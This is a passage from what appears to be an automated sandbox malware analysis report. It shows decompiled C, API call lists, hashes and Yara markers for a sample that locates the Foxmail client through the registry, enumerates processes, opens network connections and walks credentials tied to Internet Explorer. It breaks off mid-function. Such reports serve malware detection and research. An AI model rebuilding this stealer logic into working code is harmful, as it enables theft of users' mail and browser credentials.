                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 4ca0ed14984a63e0859da84a8760ea8dc2d87763cbc729b81a6c879608b00665
                                      • Instruction ID: bd7af0378adee51cffc45651800f1b6b0991203346bc2986ce5d72187e469e36
                                      • Opcode Fuzzy Hash: 4ca0ed14984a63e0859da84a8760ea8dc2d87763cbc729b81a6c879608b00665
                                      • Instruction Fuzzy Hash: B2F0C831A0024CBBDB159F61DC49FAEBFB8EF04751F4401A8F905A61A0CF709F80DA80
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00438A40, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00438A40(void* __ecx) {
				int _v8;
				void* _v12;
				void* _t7;

				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
					L3:
					_t7 = 0;
				} else {
					_v8 = 0x104;
					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x4467a0,  &_v8) != 0) {
						goto L3;
					} else {
						PathRemoveFileSpecA(0x4467a0);
						_t7 = 1;
					}
				}
				return _t7;
			}






                                      0x00438a63
                                      0x00438a97
                                      0x00438a97
                                      0x00438a65
                                      0x00438a68
                                      0x00438a8a
                                      0x00000000
                                      0x00438a8c
                                      0x00438a8d
                                      0x00438a93
                                      0x00438a93
                                      0x00438a8a
                                      0x00438a9b

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 00438A5B
                                      • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,004467A0,?), ref: 00438A82
                                      • PathRemoveFileSpecA.SHLWAPI(004467A0), ref: 00438A8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileOpenPathQueryRemoveSpecValue
                                      • String ID: Executable$software\Aerofox\FoxmailPreview
                                      • API String ID: 3687894118-2371247776
                                      • Opcode ID: 8c510178d640b74989c181940c7151f7b94a54d62532ec0dd0af4eb7242cc4a4
                                      • Instruction ID: 1186caf8de6d69a179c544835f409e5ff495f8f9e0d18039a8cad436d0865d28
                                      • Opcode Fuzzy Hash: 8c510178d640b74989c181940c7151f7b94a54d62532ec0dd0af4eb7242cc4a4
                                      • Instruction Fuzzy Hash: 47F03778644308BAEB209FA0DD46FABBBBC9746F05F50416ABA05F1181D6F49A01D92D
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00CC5621, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: c6345725517d69df9e5ebd187d710527e6c8a6fa596804ea4aa6da59d8af1f01
                                      • Instruction ID: 44afa6afc0597ce160cf2a8765a7b577cd5b932b314ba772859c89281e4434a2
                                      • Opcode Fuzzy Hash: c6345725517d69df9e5ebd187d710527e6c8a6fa596804ea4aa6da59d8af1f01
                                      • Instruction Fuzzy Hash: 8B41B076A006009FCB24DF68C881F6AB3A5EF89714F5545ACE529EB351D731BE41DB80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00CC9317, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 00CC9320
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC9343
                                        • Part of subcall function 00CC6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,00CC852B,00001000,?,?,?,?,00CC3843), ref: 00CC6F11
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CC9369
                                      • _free.LIBCMT ref: 00CC937C
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CC938B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                      • String ID:
                                      • API String ID: 2278895681-0
                                      • Opcode ID: c1410d1d38ade23dde5940140c644022790d408288daa1ba8f6a014fd85dc7bc
                                      • Instruction ID: e84332f2f3f4915d06bee320457aab676c34422b6d2a4a3f61aaa16dc5a1e1fd
                                      • Opcode Fuzzy Hash: c1410d1d38ade23dde5940140c644022790d408288daa1ba8f6a014fd85dc7bc
                                      • Instruction Fuzzy Hash: CC01F7726012957F232116B7DD8DF7F7A6DDEC6BA5319022EF918C61A0EF708D0191B0
                                      Uniqueness

                                      Uniqueness Score: 0.55%

                                      Function 00CC7901, Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00CC621F,00CC47EE), ref: 00CC7906
                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,?,?,00CC621F,00CC47EE), ref: 00CC792C
                                      • _free.LIBCMT ref: 00CC796C
                                      • _free.LIBCMT ref: 00CC799F
                                      • SetLastError.KERNEL32(00000000,?,00CC621F,00CC47EE), ref: 00CC79AC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: b8002f54b330bf598c86ca86e940309471ec02eebe733b4b6405ac19c9f5eddb
                                      • Instruction ID: 06b0af7541eafe4fd125be97048cb38eeb0739289435e9ee1413edbc4512bbb6
                                      • Opcode Fuzzy Hash: b8002f54b330bf598c86ca86e940309471ec02eebe733b4b6405ac19c9f5eddb
                                      • Instruction Fuzzy Hash: 891100321086006AD6023739ED95F3F225EDF89734B36072CF539A62E1EF30CE026A20
                                      Uniqueness

                                      Uniqueness Score: 0.32%

                                      Function 00CC77B3, Relevance: 7.6, APIs: 5, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00CC379D,?,?,?,00CC385A,00000000), ref: 00CC77B7
                                      • _free.LIBCMT ref: 00CC780E
                                      • _free.LIBCMT ref: 00CC7842
                                      • SetLastError.KERNEL32(00000000,00000000), ref: 00CC784F
                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,?,00CC385A,00000000), ref: 00CC785B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: f5c0c1da690943efaf0ee487661e16be27877a425fe7cb666c643f6bcfaa7c67
                                      • Instruction ID: 889e583b4d70d6c95f7261f3727787f727f385e6691f15570da620da4370a768
                                      • Opcode Fuzzy Hash: f5c0c1da690943efaf0ee487661e16be27877a425fe7cb666c643f6bcfaa7c67
                                      • Instruction Fuzzy Hash: 5411C4315086406AE6123734ED9AF3F2619EF95731F31032CFA35A65E5FF248E42AB21
                                      Uniqueness

                                      Uniqueness Score: 0.32%

                                      Function 0043D344, Relevance: 7.6, APIs: 5, Instructions: 56networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 0043D361
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0043D372
                                      • gethostbyname.WS2_32(?), ref: 0043D380
                                      • htons.WS2_32(?), ref: 0043D3A6
                                      • connect.WS2_32(00000000,?,00000010), ref: 0043D3B9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupconnectgethostbynamehtonssocket
                                      • String ID:
                                      • API String ID: 2405761414-0
                                      • Opcode ID: 3eb7c27063360c3ae1bfb45e76e9b027dc0ef801ef8a35c101d8ed5c5461a5db
                                      • Instruction ID: 00f42c6ece0269ce34471c2f573ca3758fc48681b69e043a47737d3ab29ccbd5
                                      • Opcode Fuzzy Hash: 3eb7c27063360c3ae1bfb45e76e9b027dc0ef801ef8a35c101d8ed5c5461a5db
                                      • Instruction Fuzzy Hash: F501F5B56003046BE2109F74AC4DE7BB7BCEF49B21F00193AFD54D71A1E6A4CD1883AA
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0043EC17, Relevance: 7.5, APIs: 5, Instructions: 44processCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043EC17(signed int* __ecx, void* __edx) {
				char _v524;
				intOrPtr _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t8;
				void* _t14;
				void* _t18;
				signed int* _t19;

				_t14 = __edx;
				_v560 = 0x22c;
				_t19 = __ecx;
				_t18 = CreateToolhelp32Snapshot(2, 0);
				if(_t18 == 0xffffffff) {
					L6:
					 *_t19 =  *_t19 & 0x00000000;
				} else {
					_t8 =  &_v560;
					Process32FirstW(_t18, _t8);
					while(_t8 != 0) {
						if(_v552 == _t14) {
							CloseHandle(_t18);
							E00433412(_t19,  &_v524);
						} else {
							_t8 = Process32NextW(_t18,  &_v560);
							continue;
						}
						goto L7;
					}
					CloseHandle(_t18);
					goto L6;
				}
				L7:
				return _t19;
			}










                                      0x0043ec27
                                      0x0043ec29
                                      0x0043ec33
                                      0x0043ec3b
                                      0x0043ec40
                                      0x0043ec73
                                      0x0043ec73
                                      0x0043ec42
                                      0x0043ec42
                                      0x0043ec4a
                                      0x0043ec68
                                      0x0043ec58
                                      0x0043ec7e
                                      0x0043ec8d
                                      0x0043ec5a
                                      0x0043ec62
                                      0x00000000
                                      0x0043ec62
                                      0x00000000
                                      0x0043ec58
                                      0x0043ec6d
                                      0x00000000
                                      0x0043ec6d
                                      0x0043ec77
                                      0x0043ec7c

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0043EC35
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0043EC4A
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0043EC62
                                      • CloseHandle.KERNEL32(00000000), ref: 0043EC6D
                                      • CloseHandle.KERNEL32(00000000), ref: 0043EC7E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1789362936-0
                                      • Opcode ID: 930a36f03503a4ea6ecc1c729fa0a81d5e552ffdca14f734a6d56a4347d41b84
                                      • Instruction ID: 0585f3969ccf14d8b38e3a8e6ed8769177a4677a00fd7f4f3b1f66289f023fc5
                                      • Opcode Fuzzy Hash: 930a36f03503a4ea6ecc1c729fa0a81d5e552ffdca14f734a6d56a4347d41b84
                                      • Instruction Fuzzy Hash: 8801D631601218ABD7305BA6AC4CB7F76BCEB4A725F1010BAF615D21D0D7B88D41CA59
                                      Uniqueness

                                      Uniqueness Score: 0.68%

                                      Function 00CC9815, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00CC982D
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC983F
                                      • _free.LIBCMT ref: 00CC9851
                                      • _free.LIBCMT ref: 00CC9863
                                      • _free.LIBCMT ref: 00CC9875
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: dc1b053296ea4955b1c1565d79abc4dd918889867181ea31fd3d272fcce336a0
                                      • Instruction ID: 43b498d3104b70e4fb4e41f7068630b40babed80604fabf2f295ae00f62eedbc
                                      • Opcode Fuzzy Hash: dc1b053296ea4955b1c1565d79abc4dd918889867181ea31fd3d272fcce336a0
                                      • Instruction Fuzzy Hash: A6F01233504344EB8660DB54EAC9F2E73D9FE49714B54081DF05DDBA91CB30FD808A60
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0043A64F, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043A64F(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                      0x0043a658
                                      0x0043a660
                                      0x0043a66a
                                      0x0043a670
                                      0x0043a678
                                      0x0043a67e
                                      0x0043a686
                                      0x0043a68c
                                      0x0043a694
                                      0x0043a69a
                                      0x0043a69c
                                      0x0043a6a5

                                      APIs
                                      • FreeLibrary.KERNEL32(?,00000001,?,00000000,00439DD8), ref: 0043A660
                                      • FreeLibrary.KERNEL32(?,?,00000000,00439DD8), ref: 0043A670
                                      • FreeLibrary.KERNEL32(?,?,00000000,00439DD8), ref: 0043A67E
                                      • FreeLibrary.KERNEL32(?,?,00000000,00439DD8), ref: 0043A68C
                                      • FreeLibrary.KERNEL32(?,?,00000000,00439DD8), ref: 0043A69A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bc64e80cbbe43d31534dee162c12fd89d4ba44631b81bd9d6f208657512a4ee6
                                      • Instruction ID: 94c92cf5200aa24d7ead679483254c927c16e466122c1acebb6344d874c6b208
                                      • Opcode Fuzzy Hash: bc64e80cbbe43d31534dee162c12fd89d4ba44631b81bd9d6f208657512a4ee6
                                      • Instruction Fuzzy Hash: 86F0AEB5B01B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0043A2CD, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043A2CD(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                      0x0043a2d6
                                      0x0043a2de
                                      0x0043a2e8
                                      0x0043a2ee
                                      0x0043a2f6
                                      0x0043a2fc
                                      0x0043a304
                                      0x0043a30a
                                      0x0043a312
                                      0x0043a318
                                      0x0043a31a
                                      0x0043a323

                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A2DE
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A2EE
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A2FC
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A30A
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00439885), ref: 0043A318
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bc64e80cbbe43d31534dee162c12fd89d4ba44631b81bd9d6f208657512a4ee6
                                      • Instruction ID: 94c92cf5200aa24d7ead679483254c927c16e466122c1acebb6344d874c6b208
                                      • Opcode Fuzzy Hash: bc64e80cbbe43d31534dee162c12fd89d4ba44631b81bd9d6f208657512a4ee6
                                      • Instruction Fuzzy Hash: 86F0AEB5B01B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00439EA9, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E00439EA9(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				char _v96;
				char _v100;
				void* _t124;
				void* _t127;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t147;
				void* _t148;
				void* _t159;
				void* _t162;
				void* _t186;
				char _t226;
				intOrPtr _t229;
				char _t234;
				void* _t235;

				_t234 = 0;
				_t186 = __ecx;
				_t226 = 0;
				_v16 = 0;
				_v44 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v84 = 0;
				if(E0043A1FF(__ecx) != 0) {
					_push( &_v16);
					_push(0);
					_push(0x446140);
					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
						_push( &_v20);
						_push( &_v44);
						_push(0x200);
						_push(_v16);
						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
							_t240 = _v44;
							if(_v44 != 0) {
								_v80 = 0;
								_v40 = 0;
								_v36 = 0;
								do {
									_t124 = E0043A1CC(_t240);
									_push(0x10);
									_push(0x446130);
									if(_t124 == 0) {
										_push(_t226);
										_v28 = _v20 + _v40;
										_t127 = E00431000();
										_t235 = _t235 + 0xc;
										__eflags = _t127;
										if(__eflags == 0) {
											E00433412( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
											_t133 = E00433075( &_v32, E00433412( &_v64, L"Internet Explorer"));
											E00435A2D(_v64);
											_v64 = _t234;
											__eflags = _t133;
											if(__eflags != 0) {
